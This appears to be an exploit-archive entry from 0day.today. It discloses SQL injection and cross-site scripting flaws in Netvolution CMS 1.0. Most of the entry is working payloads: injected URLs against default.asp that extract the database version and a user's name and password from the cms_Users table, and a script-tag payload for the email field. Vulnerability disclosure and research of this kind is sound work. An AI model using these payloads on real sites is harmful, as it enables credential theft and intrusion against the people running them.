Netvolution CMS 1.0 (XSS/SQL) Multiple Remote Vulnerabilities

2009-01-14T00:00:00
ID 1337DAY-ID-4656
Type zdt
Reporter Ellinas
Modified 2009-01-14T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
Netvolution CMS 1.0 (XSS/SQL) Multiple Remote Vulnerabilities
=============================================================


###############################################
Found By : Ellinas aka Greek                                                                           
Vulnerable Product: CMS netvolution v1.0                            
##############################################

SQL Injection

Version Finding:

http://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=100%20AND%20SUBSTRING(@@version,1,130)=5


Password Finding:

http://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=101%20AND%20
(select%20(substring(userPassword,1,10000))%20FROM%20cms_Users%20where%20userID=4)%20%3E%20608


Username Finding:

http://site/default.asp?pid=8&la=1&bpe_ac=2&bpe_nid=101%20
AND%20(select%20(substring(userName,1,10000))%20FROM%20cms_Users%20where%20userID=4)%20%3E%20608

Cross Site Scripting

Set the variable email to >"><ScRiPt%20%0a%0d>alert(XSS)%3B</ScRiPt>


************************



#  0day.today [2018-04-01]  #